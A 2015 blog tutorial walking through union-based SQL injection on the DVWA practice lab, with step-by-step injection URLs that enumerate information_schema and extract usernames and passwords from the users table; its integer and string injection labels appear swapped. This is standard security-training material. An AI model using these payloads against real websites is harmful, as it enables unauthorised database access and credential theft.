Saturday, 25 July 2015

Union Based SQL Injection on DVWA | Rahul Tyagi

Advance SQL Injection on DVWA
Union Based injection is a part of Injections after Bypass authentication when you can not hack any website via front end other words admin login page then we try to attack the database of the website in such a way so that we can reach the username and password of the website and later those username and password can be used for the login purpose.
Database--> tables ---> Columns --> Data
Step 1: Find a GET method in any URL of the website.
http://127.0.0.1/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#
GET Method : .php?id=10   | Length is Dynamic
Post Method :.php    | Fixed Length
Step 2: Check the exception handling
http://127.0.0.1/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#
Integer Type Injection :id=1'
String Based Injection :id=1
Step 3: Count the total number of columns in the respective URL table.
http://127.0.0.1/dvwa/vulnerabilities/sqli/?id=1' order by 1--+&Submit=Submit#
Step 4: Check the vulnerable column from these two columns where we can add our query.
http://127.0.0.1/dvwa/vulnerabilities/sqli/?id=1' union select 1,2--+&Submit=Submit#
Schema : Database ki MAA (:P)
Tt holds the responsibility to hold the structure of the data.along with index name of all the tables and columns.
Tables: information_schema.tables--
Columns: information_schema.columns--
Step 5: Check the version of the database along with database name.
http://127.0.0.1/dvwa/vulnerabilities/sqli/?id=1' union select database(),version()--+&Submit=Submit#
Step 6: Get the table name from the database
http://127.0.0.1/dvwa/vulnerabilities/sqli/?id=1' union select 1,table_name from information_schema.tables--+&Submit=Submit#
Target Table : users
Step 7 : Get the columns from table name users
http://127.0.0.1/dvwa/vulnerabilities/sqli/?id=1' union select 1,column_name from information_schema.columns where table_name='users'--+&Submit=Submit#
Extracted Columns: user and password
Step 8 : Get the data from user and password.
http://127.0.0.1/dvwa/vulnerabilities/sqli/?id=1' union select user,password from users--+&Submit=Submit#
Extracted user=admin and password=password

  • Stumble This
  • Fav This With Technorati
  • Add To Del.icio.us
  • Digg This
  • Add To Facebook
  • Add To Yahoo

0 comments:

Post a Comment